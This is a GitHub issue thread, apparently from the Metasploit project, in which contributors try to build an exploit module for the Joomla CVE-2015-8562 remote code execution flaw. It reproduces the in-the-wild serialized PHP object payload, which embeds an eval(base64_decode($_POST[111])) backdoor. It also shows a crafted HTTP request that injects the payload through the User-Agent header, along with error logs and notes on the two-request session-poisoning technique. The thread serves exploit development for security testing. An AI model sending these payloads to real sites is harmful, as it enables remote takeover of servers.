Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Request] Critical 0day RCE in Joomla (CVE-2015-8562) #6347

Closed
madmike33 opened this issue Dec 14, 2015 · 104 comments
Closed

[Request] Critical 0day RCE in Joomla (CVE-2015-8562) #6347

madmike33 opened this issue Dec 14, 2015 · 104 comments
Labels
feature hotness module

Comments

@madmike33
Copy link

madmike33 commented Dec 14, 2015

@jvoisin r u interested mate

This is a serious vulnerability that can be easily exploited and is already in the wild. http://hubs.ly/H01B2K20

@wvu
Copy link
Contributor

wvu commented Dec 14, 2015

Thank you, @madmike33. Looks much better, lol.

@madmike33
Copy link
Author

madmike33 commented Dec 14, 2015

Agree 😁

@madmike33 madmike33 reopened this Dec 14, 2015
@madmike33
Copy link
Author

madmike33 commented Dec 14, 2015

@wvu-r7 how about some labels

@wvu wvu added module hotness feature labels Dec 14, 2015
@firefart
Copy link
Contributor

firefart commented Dec 14, 2015

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6

@firefart
Copy link
Contributor

firefart commented Dec 14, 2015

@wvu
Copy link
Contributor

wvu commented Dec 14, 2015

@brandonprry ^

@madmike33
Copy link
Author

madmike33 commented Dec 14, 2015

@firefart tu,interesting its alla bout uploading the payload in the tokens,if iam not wrong

@firefart
Copy link
Contributor

firefart commented Dec 14, 2015

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry

@brandonprry
Copy link
Contributor

brandonprry commented Dec 14, 2015

I am very close, give me an hour or so.

@madmike33
Copy link
Author

madmike33 commented Dec 14, 2015

@brandonprry waiting to be the firsr one to test it :)

@firefart
Copy link
Contributor

firefart commented Dec 14, 2015

@brandonprry great! i need to get some sleep will check it tomorrow morning in about 6 hours

@brandonprry
Copy link
Contributor

brandonprry commented Dec 15, 2015

It takes two requests;

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. It is obvious the intent, but something seems to be missing...

@brandonprry
Copy link
Contributor

brandonprry commented Dec 15, 2015

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

@kendyhikaru
Copy link

kendyhikaru commented Dec 15, 2015

@brandonprry wait your info.

@brandonprry
Copy link
Contributor

brandonprry commented Dec 15, 2015

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.

@brandonprry
Copy link
Contributor

brandonprry commented Dec 15, 2015

They are not related.

EDIT: I might have spoken too soon.

@firefart
Copy link
Contributor

firefart commented Dec 15, 2015

@brandonprry so exactly how far I got :(

@wvu
Copy link
Contributor

wvu commented Dec 15, 2015

I poked at this on my own... and got equally as far, lol.

@wvu
Copy link
Contributor

wvu commented Dec 15, 2015

Think I got it.

@firefart
Copy link
Contributor

firefart commented Dec 15, 2015

so it seems the exploit works like some session injection. It puts in a new session identifier __test (instead of the normal __default) with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479

@wvu
Copy link
Contributor

wvu commented Dec 15, 2015

Gonna put together a PoC... hope it's not a fluke!

@firefart
Copy link
Contributor

firefart commented Dec 15, 2015

@wvu-r7 👯 so send it over for testing :D

@wvu
Copy link
Contributor

wvu commented Dec 15, 2015

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

@madmike33
Copy link
Author

madmike33 commented Dec 15, 2015

So anything new so far guys,the thing is in the payload according to sucuri they modified the payload, @wchen-r7 any idea from ur side too?

@wvu
Copy link
Contributor

wvu commented Dec 15, 2015

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

@icehteam
Copy link

icehteam commented Dec 15, 2015

Anybody with good knowledge of OOP's can execute this , I'm still trying.. anyone using skype..??
add me base64_decode('bXIuY2h1cmNobDMzdA=='); lol

@madmike33
Copy link
Author

madmike33 commented Dec 15, 2015

ye its a good idea we can make a group and evryone give his idea in skype @icehteam

@cyadron
Copy link

cyadron commented Dec 15, 2015

@shargon Do you mean that the next time you reload that page, session info is read from the databse and deserialized and the object is executed?

@shargon
Copy link

shargon commented Dec 15, 2015

@cyadron yes,i thought is like this, for run the exploit, Its necessary make 2 calls, one per poison, two per execution

The execution part its simple, joomla deserialize the session and run the poison...

The hard work its do the correct payload for exploit it

@madmike33
Copy link
Author

madmike33 commented Dec 15, 2015

yes what @cyadron said is true we need to cals also as @brandonprry perry stated earlier

@firefart
Copy link
Contributor

firefart commented Dec 15, 2015

guys please use IRC or Skype for discussing this exploit this issue is getting too big and too offtopic

@icehteam
Copy link

icehteam commented Dec 15, 2015

My skype is base64_decode('bXIuY2h1cmNobDMzdA=='); , Let me know urs folks.

@shargon
Copy link

shargon commented Dec 15, 2015

http://www.freebuf.com/vuls/89754.html <- Solved

@madmike33
Copy link
Author

madmike33 commented Dec 15, 2015

👍 @shargon

@cyadron
Copy link

cyadron commented Dec 15, 2015

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

@borismattijssen
Copy link

borismattijssen commented Dec 15, 2015

edit:
decided to remove the screenshot as I just posted it out of excitement not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

@jstnkndy
Copy link
Contributor

jstnkndy commented Dec 15, 2015

@borismattijssen What's the purpose of posting a screenshot but no technical details?

@borismattijssen
Copy link

borismattijssen commented Dec 15, 2015

@jstnkndy I feel like the vulnerability is too young to share the technical details on the internet..

@firefart
Copy link
Contributor

firefart commented Dec 15, 2015

lol

@jstnkndy
Copy link
Contributor

jstnkndy commented Dec 15, 2015

so the screenshot is just.... bragging?

@borismattijssen
Copy link

borismattijssen commented Dec 15, 2015

just showing it isn't that hard..

@falconz
Copy link

falconz commented Dec 15, 2015

@borismattijssen I see vulnerable in user agent or xfowarder, why do you hidden URI?

@HackerOnTwoWheels
Copy link

HackerOnTwoWheels commented Dec 15, 2015

@falconz my guess, it is not a private address lol

@firefart
Copy link
Contributor

firefart commented Dec 15, 2015

closing this because the details are public available and a module is also ready

@wchen-r7
Copy link
Contributor

wchen-r7 commented Dec 15, 2015

@firefart In your commit, I recommend just do Resolve #6347. That way when your PR lands, this issue automatically tags and closes it. And if you want to end the conversation early, I guess we can try to lock it (it is a button for me).

@wvu
Copy link
Contributor

wvu commented Dec 17, 2015

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

@wchen-r7 wchen-r7 changed the title [Request] Critical 0day RCE in joomla [Request] Critical 0day RCE in Joomla (CVE-2015-8562) Dec 17, 2015
@s1m096
Copy link

s1m096 commented Dec 18, 2015

Does not work with me...

@ggg4566
Copy link

ggg4566 commented Dec 19, 2015

Does not work to version below 3.x , need find other trick

@bgeesaman
Copy link

bgeesaman commented Dec 20, 2015

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

@JohnMartinelli
Copy link

JohnMartinelli commented Dec 20, 2015

If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY
FOR CODING THE FIXES as I have never contributed to an open source
project (big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for
you? I can get those to work, but not the php meterpreter variants on
the three systems I built to test this on.


Reply to this email directly or view it on GitHub
#6347 (comment).

@icehteam
Copy link

icehteam commented Dec 20, 2015

@ggg4566 X-Forward working in 3x , You need use user agent for some versions. @JohnMartinelli your late at the party fff...

@adrian-rt
Copy link

adrian-rt commented Dec 21, 2015

I've read that a session_decode() bug is needed for this to work....? Anyone can please tell me what's that bug about?

@VivekShingala
Copy link

VivekShingala commented Oct 6, 2017

Is this error harmful for other frameworks like codeigniter or core php websites? Have found these logs in such frameworks. I do not use Joomla for most of the sites, however, still find this logs.

If yes, what steps to be taken to prevent?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
feature hotness module
Projects
None yet
Development

No branches or pull requests